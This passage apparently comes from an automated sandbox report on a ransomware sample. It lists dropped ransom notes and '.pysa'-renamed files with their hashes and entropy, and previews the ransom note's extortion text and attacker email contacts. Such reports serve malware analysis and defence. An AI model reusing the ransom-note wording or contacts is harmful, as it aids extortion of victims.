                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\Default\Desktop\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\Documents\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\Default\Downloads\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\Favorites\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\Links\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\Music\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  C:\Users\Default\NTUSER.DAT.LOG1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):58368
                  Entropy (8bit):7.98634763940801
                  Encrypted:false
                  SSDEEP:1536:ZKIozbmZM5IVwfHspAy9h2iwOkN92Ct02Di5G:pozbmZYj0F9h2Ms9+k
                  MD5:37772B0C9ED04BB76791A1AE0D1AFE5E
                  SHA1:20ADBBC1252EF8419D3FE63118CA1871043A53F1
                  SHA-256:416B7685BFD5655364BEEF2BFD94917B47FB2F993A85B9795456E20F86114486
                  SHA-512:8BDC2CB7C0A2A1C55DB4D0743BE8C79A71E9F6164F6199914714897484F88EE491C22F2739EABCDBCFEFFDB0C1457D4AEA6DEDF75B751E20F96389658E423F83
                  Malicious:false
                  C:\Users\Default\NTUSER.DAT.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998176251904873
                  Encrypted:true
                  SSDEEP:3072:kcqFqfJyGujlLrZCUupaGOFgyg/XiD5aLPk+Tk1vXB/TVSplHzG3zLe2nx46UYNz:k1FqjOZLdGGg/S48+uvXXSpdGDLhL
                  MD5:EF05D6D59F478635EDF142F29C57D0AB
                  SHA1:6E539C4785A30345BCDB122ADF8E2B9EDE06077F
                  SHA-256:463E944E24137B8A614709B3A12FB939FB801980919A3DD24CEF01ECD241D25E
                  SHA-512:21B868BE54CD7851CD53BF196EE09910604E25BC11996CE4248719CF50C16899CF80110EF51BE518B76287D4EC51CC5356EDA4DA65FBA7FDE589B599899FAD25
                  Malicious:true
                  C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):66560
                  Entropy (8bit):7.989030198762352
                  Encrypted:false
                  SSDEEP:1536:SrGFHC+BiA4WDRzp24/gkduUTs96fD++4VWRSMG2HG:SpOT9DRzp21yTGqD+cRlNHG
                  MD5:5E4941C2ECB0FF54165EF2625ADCA64F
                  SHA1:11B08E16B1D138311EBD09EE79B768D514A698D6
                  SHA-256:D73709A082AD063CED918CF913E8389D04D4DAD6A96D783CAC63680B7CFAFBC9
                  SHA-512:4C9BC806B042D195D54FB988FF76E4412E3C459D8229850C91A385B268D1BAEAD62D99CD1729D9BD3E002DE0094168DEEEC91042AE6EA443F32157A5E0775785
                  Malicious:false
                  C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):514048
                  Entropy (8bit):7.99952097673692
                  Encrypted:true
                  SSDEEP:12288:t/oQHUGXk2A/2rG4YaLQj8n/Z28K3li8ErdiAr3eD0Dlc8HlF1ZEA:FdHp02+2waKWh214/rp3eADiC7Z/
                  MD5:CEEAF76FAFA0BB03864DCCC738EF16F4
                  SHA1:D7C1EB2E298552F1CC28CA02D0A4040A812676AE
                  SHA-256:8063B3E3F6E1AC8738B94C08E1C74CD56EB445A8D1223DB2DD3F948514CE671B
                  SHA-512:50E4B22A62CE5C732F054E65B5642A9A20386B83291755DFFA740282B1B9A63F5432761C28CDC5DAB8902DF31A06835487712866FABCA272866E5F958DA1C866
                  Malicious:true
                  C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):514048
                  Entropy (8bit):7.999446413191148
                  Encrypted:true
                  SSDEEP:12288:VGBS9ujABZMW0/kXLg/Y4nJgVkiALkhtooakyZBYI7:QS9uEBZMt/kyhD4RQBYI7
                  MD5:68FEB6CD8B2633046A698F15CFD17168
                  SHA1:688EB76B3F8259557153E8C1C0529FE3EDAEE742
                  SHA-256:3BA6C5176EC9284170A8325A0E6DA5F2B898812C60381846DA705E86D78AB597
                  SHA-512:9F80C38D564DD167FD7F400DD38D0DE948F83C3D8D022953B71C96DA04391F4AF8FACE1FC661EA65C39532135DB2270F23D3AE9D52E4FAC269B86C041DFCA6CF
                  Malicious:true
                  C:\Users\Default\Pictures\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  C:\Users\Default\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\Saved Games\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\Videos\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  C:\Users\Public\Desktop\Acrobat Reader DC.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.783650395533878
                  Encrypted:false
                  SSDEEP:96:o6Mrvwd+Jdfs5W6nUzGsJqqVtPncCNt99zfo+BOBwI:kv1JtEQzGsJqWECzSBl
                  MD5:07FB1B3F4D1DF90243B6BDFC21031B05
                  SHA1:9FC5B2F9F8B509BE641FA036C38298E48A2C1619
                  SHA-256:78903C7342099399CD94B489211D036DD7DBA61DA3A8F07749FE9859E6D89F20
                  SHA-512:BECB77F49F29368D3FB43213FFE004B474F5C3CE790E02C3FD3E8E560BFFCF240989FC88623F3EE6D09500ECCBB9C40B23FD7620E70D43A359345C8B2C98E6E6
                  Malicious:false
                  C:\Users\Public\Desktop\Google Chrome.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.78489587711038
                  Encrypted:false
                  SSDEEP:96:Mz3lpXc8ZTYFyazdGqnPSY5ESF4vIROxqxIfH2kOYFEkN:SC8tYFyakE5leIRsqWv1OYFEI
                  MD5:D4399B8B284FC01E489D90BF383ECB62
                  SHA1:0613D1D8320E0459440FE951A9939675CDEBE4EC
                  SHA-256:0A2D9AD7D651635AB7213B2DEBED9BE14F39FBA5799FA4FB0ACE4BFC27B80572
                  SHA-512:058906A7CDDD9DD29BB60043D0653F66F9BF52D41AF41417F41B550FF8A7BDF93C840CCE91B9C9EBF993456912E7D8074829A33F2B0BCDD7496B735906EE15F4
                  Malicious:false
                  C:\Users\Public\Desktop\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\Public\Documents\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\Public\Music\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\Public\Pictures\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\Public\Videos\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\user\3D Objects\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.046391414378092
                  Encrypted:false
                  SSDEEP:48:spYvFMqweUU/Vpz+XXloqTocZah7Ag8LdN4WnVMs/Sg9G2EtbVG+7eo/HUOO2Crw:4YvFN2HlZapAXjD/S3BjjWv+eLM/
                  MD5:76549404AECFBAA7F0609E8117784322
                  SHA1:6FAD8F06F1A317C7D59938BFF4B133A7BD07B5DB
                  SHA-256:EFC89BD27FB0D5B4304B44492E0FFDD78DEA3B385E1C8FFF40B65422CC1B7779
                  SHA-512:2CFEBA80B464112AAA4EE492FC042EFCDA8FE82D8B40B15282474FB183518A61D587A2AEA2F53CB64473CB0C54E61AAB5D3CCF6AA22D788C6176B1D203878599
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994232390939432
                  Encrypted:true
                  SSDEEP:3072:WmWDIR5dJY9l3hlEsQClxv1XGWARDeYeL:W9DIPdJYX3hlEJCzvdEiL
                  MD5:C658E484EC9402E0806A32FAB5140E68
                  SHA1:0E4AACBD517079EA8DF13E452C06612CD92CB941
                  SHA-256:2581896E953F016E6926449B48EB698A1731643196F81DA3B59F875EB19F3D83
                  SHA-512:00B14EE77F441FFE2EA69E7B799A051976B6169C4CAF56562449C0DEBC4801D5A30D081FCD1049E8F8CD15463CB608B637F1EBC5268C4C87C6309CE6F0C01F54
                  Malicious:true
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):11264
                  Entropy (8bit):7.757195668468089
                  Encrypted:false
                  SSDEEP:192:2uhExKHZGp7kWD4IJB7bsSGGcrFaJj9Ez4UA:TkpIG4g7bsSGGcSj6z1A
                  MD5:F2B1A8D3C5FDB3C03D992AF9C9CA6927
                  SHA1:6A067E6353DE2D00CA174C57C9CA7FC151F4EF43
                  SHA-256:1D614B51AACFEE3C7A26C6A5B65AF650748C3E8D5B8A00AE5C9BFB39E8241823
                  SHA-512:C05686A8CF673E128DC3E9B710997A6E8A6AFD34595CE15F91B638CA24C503EF741DEA4204118141A29A1462BDCDC7473CD2FB3182DDCEA292D234ECCF4DDB9A
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998224545724542
                  Encrypted:true
                  SSDEEP:3072:/HvpxpGIaBZZK6VIJYDGGQb6sdZbOajeadC+H6Vjc8Lh1vRNAD7u1bbDi3H6TL02:HpmcgY3GQGsdZeqC+aVjbLrLSKsH6TLF
                  MD5:FCC299607FDB76245C9DB74B49F270BB
                  SHA1:924CECC33D81208015AB452F5AAA773A73C7EB5E
                  SHA-256:9CBDEAB8112E5289371D198D54680E3C9A158364AA067CCA614CBE5D4BB79103
                  SHA-512:A6C1950558525994BC73A6C6855694401C11E8568F3A75AC3C68567C2C99DE458EF1591F5DFDE0FA6E4835A7FFF366DCF240C19D331BCBF97624FF988C588E51
                  Malicious:true
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):13312
                  Entropy (8bit):7.819195699914702
                  Encrypted:false
                  SSDEEP:384:Jc+qV1PnTt9b8REJAQ74WP9KCMOQnbGuWJXoX7W8y:JC1fTXb8REJhzPwnnK/4Xy8y
                  MD5:23017715FC7D00F8126C20514959CE8E
                  SHA1:4BD41F2282C1AAEC3B0B1C94AE202904DC2B23D8
                  SHA-256:3E3812E60A2CF136FAA4F9F311D4DAD35BDFC9AE0915D8E8466F776870ACEB38
                  SHA-512:F97928DB9B4C9F4A30DB2DF6EDFDC9638520F8BA7F8BB57CB5C8BE0E8465C7FBD3C6D26493CBD75B82822AD876E18404C95C8048B020A3F1AEAA5057EC9F0603
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):7.988252798879084
                  Encrypted:false
                  SSDEEP:1536:4Dcr2Dca89MpDaXgHzv1jMaIhoRsNQVu9fPpAWSuxRab9i621Qx:uVca89ouitMTouNQVodSuGbw6SQx
                  MD5:1343A8EA7DF3245E84A9561BCEC5B2D6
                  SHA1:E1017449FFB123E83F282DA446339253A60758B6
